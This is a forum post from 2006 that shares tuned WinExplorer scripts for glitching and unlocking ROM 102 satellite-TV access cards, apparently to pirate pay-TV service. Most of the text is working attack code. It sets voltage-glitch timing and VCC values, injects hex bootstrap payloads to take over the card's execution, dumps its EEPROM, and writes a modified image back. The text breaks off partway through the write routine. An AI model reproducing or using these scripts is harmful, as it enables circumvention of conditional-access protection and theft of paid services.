
White Nexus And Higher Rev Modified Scripts


Crazy1_79
08-06-2006, 12:08 AM
Hey guys, is anyone using the white nexus and unlocking rev 106, 107, and 108's? I have set my pot at 700 ohms with dips 2 and 5 to unlock. Now, I have modified the scripts' vcc and delay range to maximize it for the white nexus. I have never had a card glitch at over 15 vcc and have had plenty hit below 2 vcc, so I changed the vcc start and limit to 15 and 00. Now for really stubborn cards I have changed the delay start to 3800 and left the limit alone. I am 100 percent since I did this. I am also leaning away from rebelsurfs scripts. They are great work and work for many people, but I think it loops more easily. I am including both winexplorer scripts I have used. The first one is for 106 and 107. The second one is for 108. Copy and paste them to notepad and then save them as anything you want with a .xvb extension to make them valid winexplorer scripts. Please post results here, and also if for some reason your white nexus glitches at higher vcc's than mine, this may not be for you. I am NOT guaranteeing this not to loop cards. I have had great success since I changed these values. In the 106, 107 script I have left the delays default as it seems to always work for me; if it won't pop after one cycle of the delays, then change the start to &h3800. For the 108 I have already done this because it seems they like to hit a little lower than 106 and 107. I believe these scripts should also be good on a blue nexus at 200 or 700 ohms.
I am also adding my rev 105 and 103 script I have tweaked for white nexus.

REV 103 AND 105

'
' New VB Script File - Created 11/28/2005
'
'Execute Code Glitch FOR A0FF-INTERCEPT ROM 102, ALL IN ONE
'AUTO FIND VCC
'USE ON REVS 105 AND UNDER. OR KNOW WHAT YOU'RE REPLACING.
'YOU COULD LOOP YOUR CARD.
'
'Fine tune all values for your loader in
'User selectable options
'
'Notes:
'This script REQUIRES ND13 and it will check for it!!!
'
'THANKS TO: NO1B4ME, BobsBigBoy, lynard, dytene, silverman, and many others.
'
'Good Luck!
'penga


OPTION EXPLICIT
Dim FileName
Dim Dump
Dim OutFile


' You can set your own settings or use these ones.
' remove ' to use these ones in script
' CALL setupunlocker()

Sub Main()
Dim BootStrapCmd04
Dim BSCLen
Dim BSCRSP
Dim BSACK
Dim CmdToGlitch
Dim CTGLen
Dim CTGRSP
Dim CS
Dim Bytes
Dim BytesRead
Dim Bytes1
Dim Bytes2
Dim DelayStart
Dim DelayLimit
Dim VCCStart
Dim VCCLimit
Dim GlitchType
Dim GlitchMax
Dim GlitchMin
Dim Delay
Dim VCC
Dim Dot
Dim ATRrsp
Dim loopctr
Dim AddrHiStart
Dim AddrHiEnd
Dim RomAddr
Dim PageSet
Dim trys
Dim mix

clearoutputwindow
Sc.Verbose = TRUE
loopctr = 0
if CheckChipVer <> 1 then
Sc.MsgBox("You need chip version ND13 to run this script" & VbCr & "Flash your Atmel chip with NewD13.hex")
Exit Sub
End if
Sc.Verbose = False 'Turn echo on - False = turns it off
VCCStart = &h15 'h25 is standard, script is auto vcc dont change 90
VCCLimit = &h00 'h05 is standard, script is auto vcc dont change 02

'===================================================
'===================================================
'User selectable options
'===================================================
'===================================================


DelayStart = &h325 'h385 is standard, try 375, 350 has been known to hit too.
DelayLimit = &h350 'h385 is standard, try 395
GlitchMax = 9 '7 is standard - 7, 8, or 9
GlitchMin = 6 '7 is standard - 6, or 7
trys = 100 '100 is standard
mix = 0.5 '0.5 is standard - try 0.1 to 1.2 use for +-+-+-+- mix

'**************************************************************************
'**************************************************************************
'******* This Section is FOR ADVANCE USERS ONLY **********
'**************************************************************************
'**************************************************************************
'This Packet can be changed however you like and the script will generate
'the correct loader packet. Do not include the Checksum byte at the end.
'Cmd 04 without checksum byte - Check will be calculated and inserted
'Loads the RAM dumper code to EMM buffer
'
'Dumper and serial code courtesy of Lynard - Thank you
'
'-------------------------------------------------------------------------------
'NO1'S BOOTSTRAP
'------------------------------------------------
' ROM/EEPROM DUMPER!!!
' all in one
' add $8219:17 63 A1 CA 26 03 CC 60 EC CC 7D 99
' $317F write our bug in table 60DB 8219
BootStrapCmd04 = "21 00 6D A0 CA 00 00 67 04 65 01 01 86 00 AA 9D 9D 9D 9D 9D 9D 9D 9D A6 4B B7 6B 18 64 CD 7C 16 82 19 BE 0C A6 4B B7 6B 18 64 CD 7C 16 31 7F A5 04 CC 7A 99 60 DB 82 19 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D BC 80 17 63 A1 CA 26 03 CC 60 EC CC 7D 99 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D BC 80 02"
'--------------------------------------------------------------------------------------
BSCRSP = 8 'Expected Response = 12 00 04 84 00 90 00 02
'Length = 8 bytes
BSACK = &H80 'Boot Strap running Acknowledge byte
'**************************************************************************
'**************************************************************************
'**************************************************************************
'This Packet can be changed however you like and the script will generate
'the correct loader packet.
'The actual packet that we're going to glitch without Checksum
CmdToGlitch = "21 00 08 A0 CA 00 00 02 15 00 86"
CTGRSP = 6 'Length in bytes of expected response WERE LOOKING FOR 6F
'Expected Response = 12 40 02 6F 00 3F
'**************************************************************************
'**************************************************************************
'**************************************************************************

BSCLen = GetPacketLen(BootStrapCmd04)

if (BSCLen AND 1) = 1 then
Sc.MsgBox("Bad BootStrapCmd04 packet")
sc.print BSCLen
Exit Sub
End if

BSCLen = BSCLen / 2
BSCLen = BSCLen + 1 'add Checksum byte to packet length

CTGLen = GetPacketLen(CmdToGlitch)

if (CTGLen AND 1) = 1 then
Sc.MsgBox("Bad CmdToGlitch packet")
Exit Sub
End if

CTGLen = CTGLen / 2
CTGLen = CTGLen + 1 'add Checksum byte to packet length

CS=DoCheckSum (BootStrapCmd04) 'Calculates BootStrapCmd04 Checksum
BootStrapCmd04 = BootStrapCmd04 + CS 'add checksum to packet

CS=DoCheckSum (CmdToGlitch) 'Calculates packet Checksum
CmdToGlitch = CmdToGlitch + CS 'add checksum to packet

GlitchType = GlitchMax
Delay = DelayStart
VCC = VCCStart
Sc.Print "Let the 102 Glitching begin...." & VbCr
Dot = 0 'Dot progress counter if Sc.Verbose = False

Do
Do
sc.delay(5)
Sc.Write("A2")
Sc.Write("B0" & HexString(VCC, 2)) 'set glitch VCC
sc.delay(10)
Sc.Write("06 10 01 03 50 1A 00") 'reset card
Sc.Read(02)

ATRrsp = Sc.Getbyte(1)
if ATRrsp = &h1B then 'check card reset ok
Sc.Read(ATRrsp)
Exit Do
else
print VbCr & "NO ATR Rcv'd, trying 2nd ATR..."
sc.delay(100)
Sc.Write("B0" & HexString(VCC, 2)) 'set glitch VCC
sc.delay(30)
Sc.Write("08 10 01 01 01 03 50 1A 00") 'reset card
Sc.Read(02)
ATRrsp = Sc.Getbyte(1)
if ATRrsp = &h1B then 'check card reset ok
Sc.Read(ATRrsp)
Exit Do
else
print VbCr & "NO 2nd ATR Rcv'd, continue reset, back to first atr" & VbCr
'exit Do
sc.delay(100)
Sc.Write("04 01 01 01 00") 'reset card
end if
End if
loop

Sc.Write("02 15 00") 'set Tx/Rx to 32 cycles per bit
Sc.Read(02)
sc.delay(5)
'Send dirty EMM (Cmd04) with our ram dump code
Sc.Write(HexString((BSCLen + 5), 2) & "60" & HexString((BSCLen - 1), 2) & BootStrapCmd04 & "50" & HexString((BSCRSP - 1), 2) & "00")
Sc.Read(2)

Bytes = Sc.Getbyte(1)
if Bytes > 0 then
Bytes = Sc.Read(Bytes)
Bytes1 = Sc.Getbyte(0)
Bytes2 = Sc.Getbyte(5)
'--------check response to make sure = 12 00 04 97 00 90 00 11--------
if Bytes1 = &h12 and Bytes2 = &h90 then
sc.verbose = false
else
print VbCr & "Bad CMD04 response......" & VbCr
exit sub
end if
else
print VbCr & "Bad CMD04 response....." & VbCr
exit sub
End if

sc.delay(20)
'loader glitch packet
Sc.Write(HexString((CTGLen + 10), 2) & "15 60" & HexString((CTGLen - 1), 2) & CmdToGlitch & "20" & HexString(Delay, 4) & HexString(GlitchType, 2) & "50" & HexString((CTGRSP - 1), 2) & "00")

Sc.Read(2)
Bytes = Sc.Getbyte(1)
if Bytes > 4 then
Bytes = Sc.Read(Bytes)
Bytes1 = Sc.Getbyte(3)
Bytes2 = Sc.Getbyte(0)
'--------check response to SEE IF = 6F 00--------
if Bytes1 = &h6F then
sc.verbose = true
Sc.Write("A1")
Sc.Print VbCr
Sc.Print "===========================================" & VbCr
Sc.Print "Glitch Success!! A0FF-INTERCEPT IS ON" & VbCr
Sc.Print "BootLoader 6F 00 RSP Received!!" & VbCr
Sc.Print "VCC = "& HexString(VCC, 2) & " (~" & ((5/255) * VCC) &" vdc)" & VbCr
Sc.Print "Glitch Delay = "& HexString(Delay, 4) & VbCr
Sc.Print "Glitch type " & HexString(GlitchType, 2) & VbCr
Sc.Print "===========================================" & VbCr
Exit Sub

end if
if Bytes2 <> &h12 then
Vcc = Vcc + .25
print "+"
end if
else 'if bytes >4
print "NoRsp+"
VCC = VCC + .75
End if 'if bytes >4

VCC = VCC - mix
print "-"
GlitchType = GlitchType - 1

if VCC < VCCLimit then
VCC = &h15
print " hit VCCLimit, back up to & 15 vcc "
end if
if GlitchType < GlitchMin then
GlitchType = Glitchmax
end if


loopctr = loopctr +1
if loopctr > trys then
clearoutputwindow
loopctr = 0
Delay = Delay + 1
if Delay > DelayLimit then
Delay = DelayStart
end if
Sc.Print "Let the 102 Glitching continue...." & VbCr
Sc.Print " LETS TRY NEW DELAY " & VbCr
Sc.Print "Glitch Delay = "& HexString(Delay, 4) & VbCr
Sc.Print "VCC = "& HexString(VCC, 2) & VbCr
Sc.Print " " & VbCr
end if


loop

End Sub

Function GetPacketLen (Packet)
Dim Length
Dim Temp
Dim PK
Dim i

PK = ""

Length = Len(Packet) 'get packet length with spaces

for i = 1 to Length
Temp = Mid(Packet, i, 1)
if Temp <> " " then 'remove all spaces in packet
PK = PK + Temp
End if
next

GetPacketLen = Len(PK) 'return packet length without spaces

End Function


Function DoCheckSum (Packet)
Dim Temp
Dim Length
Dim PK
Dim CheckSum
Dim i

PK=""

Length = Len(Packet) 'get packet length with spaces

for i = 1 to Length
Temp = Mid(Packet, i, 1)
if Temp <> " " then 'remove all spaces in packet
PK = PK + Temp
End if
next

Length = Len(PK) 'get packet length without spaces

CheckSum = 0

for i = 0 to Length
i=i+1 'Simulate Step 2 in VB scripting
Temp = Mid(PK, i, 2)
CheckSum = CheckSum XOR Hex2Dec(Temp) 'Calc Checksum
next

DoCheckSum = HexString(CheckSum, 2) 'convert checksum to a hex string and return it to caller

End Function

Function Hex2Dec(HexNumber)
' This function takes 1 argument, a string containing a hex value of any digit length
' and returns the decimal equivalent
Dim DecimalValue
Dim DigitCount
Dim Digit
Dim HexDigit

HexNumber = Replace(UCase(HexNumber), " ", "")
DigitCount = Len(HexNumber)

For Digit = 1 To DigitCount

HexDigit = Mid(HexNumber, Digit, 1)
If Asc(HexDigit) < 58 Then
DecimalValue = HexDigit * 16 ^ (DigitCount - Digit)
Else
DecimalValue = (Asc(HexDigit) - 55) * 16 ^ (DigitCount - Digit)
End If
Hex2Dec = Hex2Dec + DecimalValue
Next

End Function

Function HexString(Number,Length)
' This function takes 2 arguments, a number and a length. It converts the decimal
' number given by the first argument to a Hexadecimal string with its length
' equal to the number of digits given by the second argument
Dim RetVal
Dim CurLen
RetVal=Hex(Number)
CurLen=Len(RetVal)
If CurLen<Length Then
RetVal=String(Length-CurLen,"0") & RetVal
End If
HexString=RetVal
End Function

Function CheckChipVer()

CheckChipVer = 1

sc.write("90")
delay(80)

if sc.read(4) <> 4 then
CheckChipVer = 0
Exit Function
End if

if getbyte(0) <> &H4E then CheckChipVer = 0
if getbyte(1) <> &H44 then CheckChipVer = 0
if getbyte(2) <> &H31 then CheckChipVer = 0
if getbyte(3) <> &H33 then CheckChipVer = 0

End Function
Function setupunlocker()
sc.print "________________Setting up WinExplorer_________________" & VbCr
Wx.BaudRate = 115200
Wx.ResetBaudRate = 115200
Wx.Parity = 0 ' 0 = None, 1 = Odd, 2 = Even, 3 = Mark, 4 = Space
Wx.StopBits = 0 ' 0 = 1 stop bit, 1 = 1.5 stop bits, 2 = 2 stop bits
Wx.DTRControl = 0 ' Initial state of DTR 0 = off, 1 = on
Wx.RTSControl = 1 ' Initial state of RTS 0 = off, 1 = on
Wx.ResetDelay = 100 ' In microseconds
Wx.ByteDelay = 10 ' In microseconds
Wx.RxByteTimeout = 500 ' In milliseconds
Wx.ResetMode = 2 ' 0 = No Resets, 1 = ISO Reset (Expect a ATR), 2 = Device Reset (No ATR)
Wx.ResetLine = 1 ' 0 = Toggle RTS for Reset, 1 = Toggle DTR for Reset
Wx.ByteConvention = 1 ' 0 = Inverse, 1 = Direct
Wx.FlushEchoByte = 0 ' 0 = no flush, 1 = flush - A Phoenix interface will echo each byte transmitted.
Wx.FlushBeforeWrite = 1 ' 0 = no flush, 1 = flush - Flush the receive buffer before each write to strip off Null bytes.
Wx.IgnoreTimeouts = 1 ' 0 = Abort script on a receive timeout, 1 = Ignore all receive timeouts
Wx.ResetAfterTimeout = 0 ' 0 = Don't reset after a timeout, 1 = do a reset after a timeout - Not used if "IgnoreTimeouts=0"
Wx.LogTransactions = 0 ' 0 = Don't log transactions, 1 = log transactions
Wx.DisplayUSW = 0 ' Display USW after script complete 0 = no, 1 = yes
Wx.DisplayFuse = 0 ' Display Fuse after script complete 0 = no, 1 = yes
End function



REV 106 and REV 107
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
'X Rom10X Reader/Writer/Unlocker X
'X For ROM 102 Cards REV 106-107-242-243-282-283 X
'X X
'X XXXXX XX XXXX X
'X XX XX XXX XX XX XXX XX XX XX XX X
'X XX XX XX XX XXX XXX XX XX XX XX XX X
'X XX XX XX XX XX X XX XX XX XX XXX X
'X XXXX XX XX XX XX XX XX XX XXX X
'X XX XX XX XX XX XX XX XX XX XX XX X
'X XX XX XXX XX XX XX XX XX XX XX X
'X XX XX XXXX XXXX X
'X =========================================== X
'X Please Note: Attempt to read your card a few times to make sure that your loader is set up X
'X properly before you attempt to write to your card. USE AT YOUR OWN RISK! X
'X You may loop your CAM!!!!! X
'X Various code snippets used from other scripts posted. Kudos to the Authors.. you know who you X
'X are. X
'X X
'X ROM10X Coder Team X
'X www.rom10x.com X
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Const fsoSEEK_SET = 0
Const fsoSEEK_CUR = 1
Const fsoSEEK_END = 2
Const ofOverwritePrompt = &H2 ' Generates a warning message if the user tries to select a file name that is already in use,
Const ofHideReadOnly = &H4 ' Removes the Open As Read Only check box from the dialog.
Const ofPathMustExist = &H800 ' Generates an error message if the user tries to select a file name with a nonexistent directory path.
Const ofFileMustExist = &H1000 ' Generates an error message if the user tries to select a nonexistent file. (only applies to Open dialogs).
Const ofShareAware = &H4000 ' Ignores sharing errors and allows files to be selected even when sharing violations occur.
Const ofEnableSizing = &H800000 ' (Windows 98 and later) Lets the Explorer-style dialog be resized with the mouse or keyboard.
Dim T1
Dim T2
Dim T3
Dim T4
Dim T5
Dim T6
Dim EEPROMFileName
Dim OutFileHndl, FileName, FileHandle
Dim WriteDelay


'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
WriteDelay = 10 'This can be edited to increase delays for slower loaders. Default = 10 X
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Sub Main()

Sc.Verbose = false 'set to true to view RX/TX from card

Dim Bytes
Dim Byte1
Dim Byte2
Dim Byte3
Dim Ulock
Dim CS
Dim SFlag
Dim RomVer
Dim RetVal

ClearOutputWindow()

Call SetupUnlocker()

If CheckChipVer = 1 Then
Else
Sc.MsgBox("This script requires ND13 atmel code. Please flash your loader with ND13.")
Exit Sub
End If

If CheckCard = 1 Then
Else
Exit Sub
End If

Sc.Write("02 15 00")
Sc.Read(2)

Do
RetVal = Sc.ButtonBox("Please choose function to perform:" & vbcrlf & vbcrlf, vbDefaultButton3 + vbCritical, "Rom10X 102 Read/Write/Unlock Utility", "Read Card", "Write Card", "Unlock Card", "Exit")

If RetVal = 0 Or RetVal = 4 Then
Sc.Print ("User Aborted!") & VbCr
Exit Do
End If

If RetVal = 1 Then
Call ReadCard()
End If

If RetVal = 2 Then
Call WriteCard()
End If

If RetVal = 3 Then
Call MethodThree()
End If
Loop
End Sub

Sub MethodThree

Dim BSCLen
Dim CmdToGlitch
Dim CmdTosetup
Dim CTGLen
Dim CTGLen2
Dim CTGRSP
Dim CS
Dim Bytes
Dim BytesRead
Dim Bytes1
Dim Bytes2
Dim DelayStart
Dim DelayLimit
Dim VCCStart
Dim VCCLimit
Dim GlitchType
Dim GlitchMax
Dim GlitchMin
Dim Delay
Dim VCC
Dim Dot
Dim ATRrsp
Dim loopctr
Dim AddrHiStart
Dim AddrHiEnd
Dim cRet
Dim RomAddr
Dim PageSet
Dim trys
Dim mix
Dim AVRDelay
Dim AVRCount

clearoutputwindow()

loopctr = 0
AVRCount = 0

If CheckChipVer <> 1 Then
Sc.MsgBox("You need chip version ND13 to run this script" & VbCr & "Flash your Atmel chip with NewD13.hex")
Exit Sub
End If

Sc.Verbose = false 'Turn echo on - False = turns it off
VCCStart = &H15 'h25 is standard, script is auto vcc dont change 90
VCCLimit = &H00 'h05 is standard, script is auto vcc dont change 02

'==========================================================================
'==========================================================================
'User selectable options
'==========================================================================
'==========================================================================

DelayStart = &H39E7 'Change this to whatever you want
DelayLimit = &H3A50 'This is the limit. it will go back to DelayStart when it reaches here.
GlitchMax = 7 '7 is standard - 7, 8, or 9
GlitchMin = 7 '7 is standard - 6, or 7
trys = 40 '100 is standard
mix = 0.5 '0.5 is standard - try 0.1 to 1.2 use for +-+-+-+- mix
AVRDelay = 3 'Minimum = 3 Delay for atmel to wait for a response
'***************************************************************************
'***************************************************************************
'******* This Section is FOR ADVANCE USERS ONLY ********
'***************************************************************************
'***************************************************************************

GlitchType = GlitchMax
Delay = DelayStart
VCC = VCCStart
Sc.Print("Let the 102 Glitching begin...." & VbCr)
Dot = 0
Do
Do
Sc.Write("A2")
Sc.Write("B0" & HexString(VCC, 2))

Sc.Write("06 10 01 03 50 1A 00")
Sc.Read(2)

ATRrsp = Sc.Getbyte(1)

Sc.Read(ATRrsp)
If ATRrsp = &H1B Then
Exit Do
Else
Sc.Write("B0" & HexString(VCC, 2))
sc.delay(30)
Sc.Write("08 10 01 01 01 03 50 1A 00")
Sc.Read(2)
ATRrsp = Sc.Getbyte(1)
If ATRrsp = &H1B Then
Sc.Read(ATRrsp)
Exit Do
Else
print(VbCr & "NO 2nd ATR Rcv'd, continue reset, back to first atr" & VbCr)
sc.delay(100)
Sc.Write("04 01 01 01 00")
End If
End If
Loop

Sc.Write("02 15 00")
Sc.Read(2)

Sc.Write("0A 60 04 21 C1 01 80 61 50 04 00")
Sc.Read(2)
cRet = Sc.Getbyte(1)
Sc.Read(cRet)

Sc.Write("0B 60 05 21 C1 02 5A 44 FC 50 03 00")
Sc.Read(2)
cRet = Sc.Getbyte(1)
Sc.Read(cRet)

Sc.Write ("73 0A 70 8D 00 A7 00 00 00 00 00 00 00 00 00 00 00 00 71 80 18 64 A6 4B B7 6B CD 7C 16 30 C0 A4 02 18 64 CD 7C 16 95 C0 A6 07 18 64 CD 7C 16 31 76 AD 08 20 18 95 BF BF A1 FF 27 01 87 BC 88 01 1E 05 00 60 DB 95 C0 DE CA FE C0 FF EE CD 5A C0 00 B5 0D F8 06 A6 06 B7 64 B7 4C CD 45 05 20 FE 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")
Sc.Read(2)
Sc.Write ("47 0E" & hexstring(AVRDelay, 2) & "0B 60 3A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 AE BC 20" & HexString(Delay, 4) & HexString(GlitchType, 2) & "50 05 00")
Sc.Read(2)
Bytes = Sc.Getbyte(1)
sc.verbose = true
Sc.Read(Bytes)
sc.verbose = false
If Bytes > 3 then
AVRCount = 0
Bytes1 = Sc.Getbyte(0)
Bytes2 = Sc.Getbyte(3)

If Bytes1 = &hDE And Bytes2 = &HC0 Then
Sc.Write("A1")
Sc.Print(VbCr)
Sc.Print("===========================================" & VbCr)
Sc.Print("Glitch Success!! DE CA FE C0 FF EE" & VbCr)
Sc.Print("Card is Unlocked!!!" & VbCr)
Sc.Print("VCC = " & HexString(VCC, 2) & " (~" & ((5 / 255) * VCC) & " vdc)" & VbCr)
Sc.Print("Glitch Delay = " & HexString(Delay, 4) & VbCr)
Sc.Print("Glitch type " & HexString(GlitchType, 2) & VbCr)
Sc.Print("===========================================" & VbCr)
Exit Sub
Else
If Bytes2 = &H6F Then
sc.print("-")
Else
If Bytes2 = &HFF Then
Sc.Print("+")
Else
sc.print "NoRsp+"
End If
End If
End If

If Bytes1 = &H12 Then
Vcc = Vcc + 0.25
End If
Else
AVRCount = AVRCount + 1
If AVRCount => 5 then
AVRDelay = AVRDelay + 1
Sc.print "Increasing AVR delay to " & hexstring(AVRdelay ,2) & vbcr
AVRCount = 0
End If
End If

VCC = VCC - mix
print("-")
GlitchType = GlitchType - 1
If VCC < VCCLimit Then
VCC = VCCStart
End If
If GlitchType < GlitchMin Then
GlitchType = Glitchmax
End if
loopctr = loopctr + 1
If loopctr > trys Then
clearoutputwindow()
loopctr = 0
Delay = Delay + 1
If Delay > DelayLimit Then
Delay = DelayStart
End If
'end if
Sc.Print("Let the 102 Glitching continue...." & VbCr)
Sc.print("AVR delay = " & hexstring(AVRdelay ,2) & VbCr)
Sc.Print("Glitch Delay = " & HexString(Delay, 4) & VbCr)
Sc.Print("VCC = " & HexString(VCC, 2) & VbCr)
Sc.Print(" " & VbCr)
End If
Loop
End Sub

Sub ReadCard()

Dim Bytes
Dim BootStrap
Dim CS
Dim Counter
Dim PBCounter
Dim Address

Address = 12288
PBCounter = 1

Sc.Write("06100103501A00") '-Get ATR
Sc.Delay(80)
Sc.Read(2)
Bytes = Sc.GetByte(1)
Sc.Read(Bytes)
Sc.Write("021500")
Sc.Read(2)
Sc.Write("0A600421C101A041500400") '-Set IFS
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(Bytes)

GetEEPROMFileName()

Do
'Get 64 bytes from Card using "Address" as pointer
BootStrap = "21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9D7180 CD5AC0" & HexString(Address, 4) & "0DF840B691B74CCD4505CC7A959D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D02"

CS = DoCheckSum(BootStrap) 'Get Checksum of BootStrap string
BootStrap = BootStrap & CS
Sc.Write("77150E036070" & BootStrap & "8700")
Sc.Read(2)
bytes = Sc.GetByte(1)
Sc.Read(bytes)

Sc.Write("1215AA210007A0FF0000024800330E03504000") 'Execute BootStrap String with A0FF intercept
Sc.Read(2)
Bytes = Sc.GetByte(1)
Sc.Read(bytes)

If Bytes = 0 Then 'Check condition of Atmel after read request
Print(VbCr & "--- Eeprom Read Failed, A0FF intercept is not installed, Or card locked. ---")
Call Sc.MsgBox("--- Eeprom Read Failed, A0FF intercept is not installed ---")
Exit Sub
End If

If Bytes = 65 Then
Counter = Counter + 1

For i = 0 To 63
Call Fs.FilePutc(OutFileHndl, Sc.GetByte(i))
Next

Call Sc.ProgressBox("Address: " & Hexstring(Address, 4), PBCounter, 288, "Saving Eeprom information...")

Address = Address + 64 'increment address pointer by &h40 bytes

If Address = 14336 Then 'If address gets to $3800 then change it to $8000
Address = 32768
End If

PBCounter = PBCounter + 1 'Increment the progressbar

If Address = 49152 Then Exit Do 'If we're at the end, then exit
End If
Loop
Call Sc.ProgressBox("", 0, 256) 'close the progressbar

Fs.FileClose(OutFileHndl) 'close the file
Sc.MsgBox("Reading Complete!")
End Sub

Sub WriteCard()

Dim CheckBugs
Dim BugOrig
Dim InFile
Dim FileName
Dim FileSize
Dim ThisByte
Dim TmpStr
Dim Outfile
Dim CC
Dim Address
Dim Bytes
Dim PBCounter
Dim Tmp1
Dim Tmp2

Address = 12416
PBCounter = 1
'---------------------------------------------------------------------------------------------
Const FileFilter = "All Eprom Files (*.bn102, *.bin)|*.bn102;*.bin;|Bin Files (*.bn102)|*.bn102|Bin Files (*.bin)|*.bin"

FileName = Fs.FileOpenDialog(FileFilter, "Please select a valid bin file", "Default.bn102", ofPathMustExist + ofFileMustExist + ofHideReadOnly + ofEnableSizing)
If FileName <> "" Then
If Fs.FileExists(FileName) = 0 Then
Sc.MsgBox("The file does not exist")
Else
InFile = Fs.FileOpen(FileName, fsoOpenRead)
End If
End If

FileSize = Fs.FileSeek(InFile, 0, fsoSEEK_END)

If FileSize <> 18432 Then
Sc.MsgBox("This file does not appear to be a valid ROM 102 EEPROM file")
Exit Sub
End If

If CheckChipVer = 1 Then
Else
Sc.MsgBox("This script requires ND13 atmel code. Please flash your loader with ND13.")
Exit Sub
End If

If CheckCard = 1 Then
Else
Exit Sub
End If

Sc.Write("02 15 00") 'set baud
Sc.Read(2)

Sc.Write("0A600421C101A041500400") '-set IFS
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

'This CMD 04 Gets the original value of the first bugtable entry.
'We are going to hook here, so we need to know what was originally there, so we can replace
'after we're finished writing.
CheckBugs = ("21 00 6D A0 CA 00 00 67 04 65 01 01 86 00 AA 9D 9D 9D 9D 9D 9D 9D 9D 71 80 CD 5A C0 31 78 0D F8 06 B6 91 B7 4C CD 45 05 CC 7A 95 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 02")
CC = Dochecksum(CheckBugs) 'calculates the checksum byte
CheckBugs = CheckBugs & CC 'adds the checksum byte at the end of our string

Sc.Write("77150E036070" & CheckBugs & "8700") 'sends our string
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
checklock = 0
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 0B 00") 'executes our string with the A0FF intercept
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If Bytes = &HC Then
T1 = Sc.Getbyte(0)
T2 = Sc.Getbyte(1)
T3 = Sc.Getbyte(2)
T4 = Sc.Getbyte(3)
T5 = Sc.Getbyte(4)
T6 = Sc.Getbyte(5)
'This variable stores the original Bugtable code, which will be replaced when we're finished writing
'BugOrig = hexstring(T1, 2) & hexstring(T2, 2) & hexstring(T3, 2) & hexstring(T4, 2) & hexstring(T5, 2) & Hexstring(T6, 2)
Else
Sc.Msgbox("The Card appears to be locked")
Exit Sub
End If

'This CMD 04 will write our Bootstrap patch located at $9600
BootWrite = "21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C169600A010CC7A95000000000000A1FF27 0187CD5A7D0DFA8080BC800000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002"


CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("77150E036070" & BootWrite & "8700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If bytes <> 8 Then
Sc.MsgBox("Write Failed")
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
'This CMD 04 will hook our Bugtable at $3178 = "050060DB9600" (This will later be replaced with original value)
BootWrite = ("21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C163178A006CC7A95000000000000050060 DB960000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002")
CC = Dochecksum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("756070" & BootWrite & "500700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
checklock = 0
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

Byte1 = Sc.Getbyte(0)
Byte2 = Sc.getbyte(3)

If Byte1 = &H12 And Byte2 = &H90 Then
Else
sc.msgbox("Write Failed!")
Exit Sub
End If

'-------------------------------------------------------------------------
Call Fs.FileSeek(InFile, FileSize - (FileSize - &H80), fsoSEEK_SET)

TmpStr = ""
For ThisByte = 0 To 18304
